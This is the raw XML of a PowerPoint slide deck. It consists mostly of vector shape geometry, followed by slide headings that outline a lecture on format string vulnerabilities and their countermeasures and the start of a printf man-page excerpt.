                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3FB74BD9-D25E-4007-AA22-021EDBA69EEA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6715125" y="1827213"/>
              <a:ext cx="79375" cy="85725"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 207 w 207"/>
                <a:gd name="T1" fmla="*/ 113 h 224"/>
                <a:gd name="T2" fmla="*/ 103 w 207"/>
                <a:gd name="T3" fmla="*/ 0 h 224"/>
                <a:gd name="T4" fmla="*/ 0 w 207"/>
                <a:gd name="T5" fmla="*/ 113 h 224"/>
                <a:gd name="T6" fmla="*/ 103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3 w 207"/>
                <a:gd name="T13" fmla="*/ 187 h 224"/>
                <a:gd name="T14" fmla="*/ 41 w 207"/>
                <a:gd name="T15" fmla="*/ 109 h 224"/>
                <a:gd name="T16" fmla="*/ 103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3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3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7" y="187"/>
                    <a:pt x="103" y="187"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="69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3" y="37"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="136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2" name="Freeform 1243">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D1DC946-19D3-4F17-AF71-254C646E67B0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId238"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6811962" y="1793875"/>
              <a:ext cx="90488" cy="119063"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 239 w 239"/>
                <a:gd name="T1" fmla="*/ 285 h 307"/>
                <a:gd name="T2" fmla="*/ 216 w 239"/>
                <a:gd name="T3" fmla="*/ 267 h 307"/>
                <a:gd name="T4" fmla="*/ 198 w 239"/>
                <a:gd name="T5" fmla="*/ 267 h 307"/>
                <a:gd name="T6" fmla="*/ 198 w 239"/>
                <a:gd name="T7" fmla="*/ 24 h 307"/>
                <a:gd name="T8" fmla="*/ 175 w 239"/>
                <a:gd name="T9" fmla="*/ 0 h 307"/>
                <a:gd name="T10" fmla="*/ 139 w 239"/>
                <a:gd name="T11" fmla="*/ 0 h 307"/>
                <a:gd name="T12" fmla="*/ 115 w 239"/>
                <a:gd name="T13" fmla="*/ 19 h 307"/>
                <a:gd name="T14" fmla="*/ 139 w 239"/>
                <a:gd name="T15" fmla="*/ 37 h 307"/>
                <a:gd name="T16" fmla="*/ 157 w 239"/>
                <a:gd name="T17" fmla="*/ 37 h 307"/>
                <a:gd name="T18" fmla="*/ 157 w 239"/>
                <a:gd name="T19" fmla="*/ 102 h 307"/>
                <a:gd name="T20" fmla="*/ 104 w 239"/>
                <a:gd name="T21" fmla="*/ 84 h 307"/>
                <a:gd name="T22" fmla="*/ 0 w 239"/>
                <a:gd name="T23" fmla="*/ 196 h 307"/>
                <a:gd name="T24" fmla="*/ 99 w 239"/>
                <a:gd name="T25" fmla="*/ 307 h 307"/>
                <a:gd name="T26" fmla="*/ 157 w 239"/>
                <a:gd name="T27" fmla="*/ 285 h 307"/>
                <a:gd name="T28" fmla="*/ 180 w 239"/>
                <a:gd name="T29" fmla="*/ 304 h 307"/>
                <a:gd name="T30" fmla="*/ 215 w 239"/>
                <a:gd name="T31" fmla="*/ 304 h 307"/>
                <a:gd name="T32" fmla="*/ 239 w 239"/>
                <a:gd name="T33" fmla="*/ 285 h 307"/>
                <a:gd name="T34" fmla="*/ 156 w 239"/>
                <a:gd name="T35" fmla="*/ 206 h 307"/>
                <a:gd name="T36" fmla="*/ 101 w 239"/>
                <a:gd name="T37" fmla="*/ 270 h 307"/>
                <a:gd name="T38" fmla="*/ 41 w 239"/>
                <a:gd name="T39" fmla="*/ 196 h 307"/>
                <a:gd name="T40" fmla="*/ 105 w 239"/>
                <a:gd name="T41" fmla="*/ 122 h 307"/>
                <a:gd name="T42" fmla="*/ 156 w 239"/>
                <a:gd name="T43" fmla="*/ 172 h 307"/>
                <a:gd name="T44" fmla="*/ 156 w 239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7">
                  <a:moveTo>
                    <a:pt x="239" y="285"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="239" y="267"/>
                    <a:pt x="224" y="267"/>
                    <a:pt x="216" y="267"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="198" y="267"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="198" y="24"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="198" y="6"/>
                    <a:pt x="195" y="0"/>
                    <a:pt x="175" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="139" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="130" y="0"/>
                    <a:pt x="115" y="0"/>
                    <a:pt x="115" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="115" y="37"/>
                    <a:pt x="130" y="37"/>
                    <a:pt x="139" y="37"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="157" y="37"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157" y="102"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="141" y="90"/>
                    <a:pt x="123" y="84"/>
                    <a:pt x="104" y="84"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49" y="84"/>
                    <a:pt x="0" y="132"/>
                    <a:pt x="0" y="196"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="258"/>
                    <a:pt x="46" y="307"/>
                    <a:pt x="99" y="307"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="124" y="307"/>
                    <a:pt x="143" y="297"/>
                    <a:pt x="157" y="285"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="158" y="299"/>
                    <a:pt x="161" y="304"/>
                    <a:pt x="180" y="304"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="215" y="304"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="225" y="304"/>
                    <a:pt x="239" y="304"/>
                    <a:pt x="239" y="285"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="156" y="206"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="156" y="232"/>
                    <a:pt x="136" y="270"/>
                    <a:pt x="101" y="270"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="68" y="270"/>
                    <a:pt x="41" y="237"/>
                    <a:pt x="41" y="196"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="41" y="152"/>
                    <a:pt x="73" y="122"/>
                    <a:pt x="105" y="122"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="134" y="122"/>
                    <a:pt x="156" y="147"/>
                    <a:pt x="156" y="172"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="156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3" name="Freeform 1244">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{973806A8-8A69-42F5-9A4C-51A2862AC070}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId239"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6919912" y="1795463"/>
              <a:ext cx="73025" cy="117475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0 w 191"/>
                <a:gd name="T5" fmla="*/ 265 h 302"/>
                <a:gd name="T6" fmla="*/ 120 w 191"/>
                <a:gd name="T7" fmla="*/ 109 h 302"/>
                <a:gd name="T8" fmla="*/ 97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2 w 191"/>
                <a:gd name="T31" fmla="*/ 28 h 302"/>
                <a:gd name="T32" fmla="*/ 94 w 191"/>
                <a:gd name="T33" fmla="*/ 0 h 302"/>
                <a:gd name="T34" fmla="*/ 65 w 191"/>
                <a:gd name="T35" fmla="*/ 28 h 302"/>
                <a:gd name="T36" fmla="*/ 94 w 191"/>
                <a:gd name="T37" fmla="*/ 57 h 302"/>
                <a:gd name="T38" fmla="*/ 122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5"/>
                    <a:pt x="176" y="265"/>
                    <a:pt x="167" y="265"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="120" y="265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="120" y="109"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="120" y="91"/>
                    <a:pt x="117" y="85"/>
                    <a:pt x="97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4" y="265"/>
                    <a:pt x="0" y="265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2" y="28"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="122" y="13"/>
                    <a:pt x="110" y="0"/>
                    <a:pt x="94" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="78" y="0"/>
                    <a:pt x="65" y="13"/>
                    <a:pt x="65" y="28"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="44"/>
                    <a:pt x="78" y="57"/>
                    <a:pt x="94" y="57"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="110" y="57"/>
                    <a:pt x="122" y="44"/>
                    <a:pt x="122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4" name="Freeform 1245">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A212DE11-5B8A-41C9-B840-3F7CDFD36407}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr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7013575" y="1792288"/>
              <a:ext cx="76200" cy="120650"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 200 w 200"/>
                <a:gd name="T1" fmla="*/ 33 h 307"/>
                <a:gd name="T2" fmla="*/ 149 w 200"/>
                <a:gd name="T3" fmla="*/ 0 h 307"/>
                <a:gd name="T4" fmla="*/ 69 w 200"/>
                <a:gd name="T5" fmla="*/ 69 h 307"/>
                <a:gd name="T6" fmla="*/ 69 w 200"/>
                <a:gd name="T7" fmla="*/ 90 h 307"/>
                <a:gd name="T8" fmla="*/ 24 w 200"/>
                <a:gd name="T9" fmla="*/ 90 h 307"/>
                <a:gd name="T10" fmla="*/ 0 w 200"/>
                <a:gd name="T11" fmla="*/ 109 h 307"/>
                <a:gd name="T12" fmla="*/ 24 w 200"/>
                <a:gd name="T13" fmla="*/ 127 h 307"/>
                <a:gd name="T14" fmla="*/ 69 w 200"/>
                <a:gd name="T15" fmla="*/ 127 h 307"/>
                <a:gd name="T16" fmla="*/ 69 w 200"/>
                <a:gd name="T17" fmla="*/ 270 h 307"/>
                <a:gd name="T18" fmla="*/ 24 w 200"/>
                <a:gd name="T19" fmla="*/ 270 h 307"/>
                <a:gd name="T20" fmla="*/ 0 w 200"/>
                <a:gd name="T21" fmla="*/ 288 h 307"/>
                <a:gd name="T22" fmla="*/ 24 w 200"/>
                <a:gd name="T23" fmla="*/ 307 h 307"/>
                <a:gd name="T24" fmla="*/ 155 w 200"/>
                <a:gd name="T25" fmla="*/ 307 h 307"/>
                <a:gd name="T26" fmla="*/ 179 w 200"/>
                <a:gd name="T27" fmla="*/ 289 h 307"/>
                <a:gd name="T28" fmla="*/ 155 w 200"/>
                <a:gd name="T29" fmla="*/ 270 h 307"/>
                <a:gd name="T30" fmla="*/ 110 w 200"/>
                <a:gd name="T31" fmla="*/ 270 h 307"/>
                <a:gd name="T32" fmla="*/ 110 w 200"/>
                <a:gd name="T33" fmla="*/ 127 h 307"/>
                <a:gd name="T34" fmla="*/ 166 w 200"/>
                <a:gd name="T35" fmla="*/ 127 h 307"/>
                <a:gd name="T36" fmla="*/ 189 w 200"/>
                <a:gd name="T37" fmla="*/ 109 h 307"/>
                <a:gd name="T38" fmla="*/ 166 w 200"/>
                <a:gd name="T39" fmla="*/ 90 h 307"/>
                <a:gd name="T40" fmla="*/ 110 w 200"/>
                <a:gd name="T41" fmla="*/ 90 h 307"/>
                <a:gd name="T42" fmla="*/ 110 w 200"/>
                <a:gd name="T43" fmla="*/ 71 h 307"/>
                <a:gd name="T44" fmla="*/ 150 w 200"/>
                <a:gd name="T45" fmla="*/ 37 h 307"/>
                <a:gd name="T46" fmla="*/ 175 w 200"/>
                <a:gd name="T47" fmla="*/ 58 h 307"/>
                <a:gd name="T48" fmla="*/ 200 w 200"/>
                <a:gd name="T49" fmla="*/ 3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307">
                  <a:moveTo>
                    <a:pt x="200" y="33"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="200" y="1"/>
                    <a:pt x="158" y="0"/>
                    <a:pt x="149" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="108" y="0"/>
                    <a:pt x="69" y="24"/>
                    <a:pt x="69" y="69"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="69" y="90"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24" y="90"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="90"/>
                    <a:pt x="0" y="91"/>
                    <a:pt x="0" y="109"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="127"/>
                    <a:pt x="15" y="127"/>
                    <a:pt x="24" y="127"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="69" y="127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="69" y="270"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24" y="270"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="270"/>
                    <a:pt x="0" y="270"/>
                    <a:pt x="0" y="288"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="307"/>
                    <a:pt x="15" y="307"/>
                    <a:pt x="24" y="307"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="155" y="307"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="164" y="307"/>
                    <a:pt x="179" y="307"/>
                    <a:pt x="179" y="289"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="179" y="270"/>
                    <a:pt x="164" y="270"/>
                    <a:pt x="155" y="270"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="110" y="270"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="110" y="127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="166" y="127"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="174" y="127"/>
                    <a:pt x="189" y="127"/>
                    <a:pt x="189" y="109"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="189" y="90"/>
                    <a:pt x="175" y="90"/>
                    <a:pt x="166" y="90"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="110" y="90"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="110" y="71"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="110" y="40"/>
                    <a:pt x="136" y="37"/>
                    <a:pt x="150" y="37"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="152" y="44"/>
                    <a:pt x="159" y="58"/>
                    <a:pt x="175" y="58"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="186" y="58"/>
                    <a:pt x="200" y="49"/>
                    <a:pt x="200" y="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5" name="Freeform 1246">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2EDB15A7-6ECA-4463-868B-E09BE310BE2D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7119937" y="1795463"/>
              <a:ext cx="73025" cy="117475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0 w 191"/>
                <a:gd name="T5" fmla="*/ 265 h 302"/>
                <a:gd name="T6" fmla="*/ 120 w 191"/>
                <a:gd name="T7" fmla="*/ 109 h 302"/>
                <a:gd name="T8" fmla="*/ 97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2 w 191"/>
                <a:gd name="T31" fmla="*/ 28 h 302"/>
                <a:gd name="T32" fmla="*/ 94 w 191"/>
                <a:gd name="T33" fmla="*/ 0 h 302"/>
                <a:gd name="T34" fmla="*/ 66 w 191"/>
                <a:gd name="T35" fmla="*/ 28 h 302"/>
                <a:gd name="T36" fmla="*/ 94 w 191"/>
                <a:gd name="T37" fmla="*/ 57 h 302"/>
                <a:gd name="T38" fmla="*/ 122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5"/>
                    <a:pt x="176" y="265"/>
                    <a:pt x="167" y="265"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="120" y="265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="120" y="109"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="120" y="91"/>
                    <a:pt x="117" y="85"/>
                    <a:pt x="97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5" y="265"/>
                    <a:pt x="0" y="265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2" y="28"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="122" y="13"/>
                    <a:pt x="110" y="0"/>
                    <a:pt x="94" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="78" y="0"/>
                    <a:pt x="66" y="13"/>
                    <a:pt x="66" y="28"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="44"/>
                    <a:pt x="78" y="57"/>
                    <a:pt x="94" y="57"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="110" y="57"/>
                    <a:pt x="122" y="44"/>
                    <a:pt x="122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6" name="Freeform 1247">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{034CC74B-F09C-46E1-BC76-40294C3CE5ED}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId242"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7215187" y="1827213"/>
              <a:ext cx="79375" cy="85725"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 207 w 207"/>
                <a:gd name="T1" fmla="*/ 165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4 w 207"/>
                <a:gd name="T9" fmla="*/ 129 h 224"/>
                <a:gd name="T10" fmla="*/ 184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5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5"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="207" y="148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3" y="165"/>
                    <a:pt x="44" y="129"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="184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5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7" name="Freeform 1248">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4C3AF28-42F1-4187-863D-9B1585B2A496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7312025" y="1793875"/>
              <a:ext cx="92075" cy="119063"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 239 w 239"/>
                <a:gd name="T1" fmla="*/ 285 h 307"/>
                <a:gd name="T2" fmla="*/ 216 w 239"/>
                <a:gd name="T3" fmla="*/ 267 h 307"/>
                <a:gd name="T4" fmla="*/ 198 w 239"/>
                <a:gd name="T5" fmla="*/ 267 h 307"/>
                <a:gd name="T6" fmla="*/ 198 w 239"/>
                <a:gd name="T7" fmla="*/ 24 h 307"/>
                <a:gd name="T8" fmla="*/ 174 w 239"/>
                <a:gd name="T9" fmla="*/ 0 h 307"/>
                <a:gd name="T10" fmla="*/ 139 w 239"/>
                <a:gd name="T11" fmla="*/ 0 h 307"/>
                <a:gd name="T12" fmla="*/ 115 w 239"/>
                <a:gd name="T13" fmla="*/ 19 h 307"/>
                <a:gd name="T14" fmla="*/ 138 w 239"/>
                <a:gd name="T15" fmla="*/ 37 h 307"/>
                <a:gd name="T16" fmla="*/ 156 w 239"/>
                <a:gd name="T17" fmla="*/ 37 h 307"/>
                <a:gd name="T18" fmla="*/ 156 w 239"/>
                <a:gd name="T19" fmla="*/ 102 h 307"/>
                <a:gd name="T20" fmla="*/ 104 w 239"/>
                <a:gd name="T21" fmla="*/ 84 h 307"/>
                <a:gd name="T22" fmla="*/ 0 w 239"/>
                <a:gd name="T23" fmla="*/ 196 h 307"/>
                <a:gd name="T24" fmla="*/ 99 w 239"/>
                <a:gd name="T25" fmla="*/ 307 h 307"/>
                <a:gd name="T26" fmla="*/ 156 w 239"/>
                <a:gd name="T27" fmla="*/ 285 h 307"/>
                <a:gd name="T28" fmla="*/ 180 w 239"/>
                <a:gd name="T29" fmla="*/ 304 h 307"/>
                <a:gd name="T30" fmla="*/ 215 w 239"/>
                <a:gd name="T31" fmla="*/ 304 h 307"/>
                <a:gd name="T32" fmla="*/ 239 w 239"/>
                <a:gd name="T33" fmla="*/ 285 h 307"/>
                <a:gd name="T34" fmla="*/ 156 w 239"/>
                <a:gd name="T35" fmla="*/ 206 h 307"/>
                <a:gd name="T36" fmla="*/ 101 w 239"/>
                <a:gd name="T37" fmla="*/ 270 h 307"/>
                <a:gd name="T38" fmla="*/ 41 w 239"/>
                <a:gd name="T39" fmla="*/ 196 h 307"/>
                <a:gd name="T40" fmla="*/ 105 w 239"/>
                <a:gd name="T41" fmla="*/ 122 h 307"/>
                <a:gd name="T42" fmla="*/ 156 w 239"/>
                <a:gd name="T43" fmla="*/ 172 h 307"/>
                <a:gd name="T44" fmla="*/ 156 w 239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7">
                  <a:moveTo>
                    <a:pt x="239" y="285"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="239" y="267"/>
                    <a:pt x="224" y="267"/>
                    <a:pt x="216" y="267"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="198" y="267"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="198" y="24"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="198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0"/>
                    <a:pt x="115" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="115" y="37"/>
                    <a:pt x="130" y="37"/>
                    <a:pt x="138" y="37"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="156" y="37"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="156" y="102"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="141" y="90"/>
                    <a:pt x="123" y="84"/>
                    <a:pt x="104" y="84"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49" y="84"/>
                    <a:pt x="0" y="132"/>
                    <a:pt x="0" y="196"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="258"/>
                    <a:pt x="46" y="307"/>
                    <a:pt x="99" y="307"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="124" y="307"/>
                    <a:pt x="142" y="297"/>
                    <a:pt x="156" y="285"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="157" y="299"/>
                    <a:pt x="160" y="304"/>
                    <a:pt x="180" y="304"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="215" y="304"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="225" y="304"/>
                    <a:pt x="239" y="304"/>
                    <a:pt x="239" y="285"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="156" y="206"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="156" y="232"/>
                    <a:pt x="135" y="270"/>
                    <a:pt x="101" y="270"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="68" y="270"/>
                    <a:pt x="41" y="237"/>
                    <a:pt x="41" y="196"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="41" y="152"/>
                    <a:pt x="73" y="122"/>
                    <a:pt x="105" y="122"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="134" y="122"/>
                    <a:pt x="156" y="147"/>
                    <a:pt x="156" y="172"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="156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8" name="Freeform 1249">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3EEBD532-BE1C-4184-90B6-B04664DC88BE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7445375" y="1792288"/>
              <a:ext cx="20638" cy="120650"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 56 w 56"/>
                <a:gd name="T1" fmla="*/ 32 h 310"/>
                <a:gd name="T2" fmla="*/ 28 w 56"/>
                <a:gd name="T3" fmla="*/ 0 h 310"/>
                <a:gd name="T4" fmla="*/ 0 w 56"/>
                <a:gd name="T5" fmla="*/ 32 h 310"/>
                <a:gd name="T6" fmla="*/ 5 w 56"/>
                <a:gd name="T7" fmla="*/ 205 h 310"/>
                <a:gd name="T8" fmla="*/ 28 w 56"/>
                <a:gd name="T9" fmla="*/ 221 h 310"/>
                <a:gd name="T10" fmla="*/ 52 w 56"/>
                <a:gd name="T11" fmla="*/ 194 h 310"/>
                <a:gd name="T12" fmla="*/ 56 w 56"/>
                <a:gd name="T13" fmla="*/ 32 h 310"/>
                <a:gd name="T14" fmla="*/ 56 w 56"/>
                <a:gd name="T15" fmla="*/ 282 h 310"/>
                <a:gd name="T16" fmla="*/ 28 w 56"/>
                <a:gd name="T17" fmla="*/ 254 h 310"/>
                <a:gd name="T18" fmla="*/ 0 w 56"/>
                <a:gd name="T19" fmla="*/ 282 h 310"/>
                <a:gd name="T20" fmla="*/ 28 w 56"/>
                <a:gd name="T21" fmla="*/ 310 h 310"/>
                <a:gd name="T22" fmla="*/ 56 w 56"/>
                <a:gd name="T23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310">
                  <a:moveTo>
                    <a:pt x="56" y="32"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="56" y="2"/>
                    <a:pt x="33" y="0"/>
                    <a:pt x="28" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="23" y="0"/>
                    <a:pt x="0" y="2"/>
                    <a:pt x="0" y="32"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="5" y="205"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="220"/>
                    <a:pt x="20" y="221"/>
                    <a:pt x="28" y="221"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="221"/>
                    <a:pt x="51" y="217"/>
                    <a:pt x="52" y="194"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="56" y="32"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="56" y="282"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="56" y="266"/>
                    <a:pt x="44" y="254"/>
                    <a:pt x="28" y="254"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="254"/>
                    <a:pt x="0" y="266"/>
                    <a:pt x="0" y="282"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="298"/>
                    <a:pt x="12" y="310"/>
                    <a:pt x="28" y="310"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="44" y="310"/>
                    <a:pt x="56" y="298"/>
                    <a:pt x="56" y="2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3141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DAD-CDF1-491E-9DE2-D8305C4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E989-2A35-4CDD-A092-9C122A6F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How format string works</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Format string vulnerability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Exploiting the vulnerability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Exploiting the vulnerability (continue)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Injecting malicious code by exploiting the vulnerability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Format string countermeasures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0789-B9AB-452A-98E2-DBFBCA3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9870-C726-41D8-B56B-51CD7919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Format string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542CFC-120E-47EC-A6C0-B46BE4974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27" y="1296370"/>
            <a:ext cx="6716634" cy="271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3879-F605-44C7-B496-B54833C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51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E251-E84F-4196-8F1F-0D671685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definition of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" err="1"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ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F2BD-6749-40C9-9BF4-22D2AD9F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NAME</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0" err="1"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-NZ" dirty="0"/>
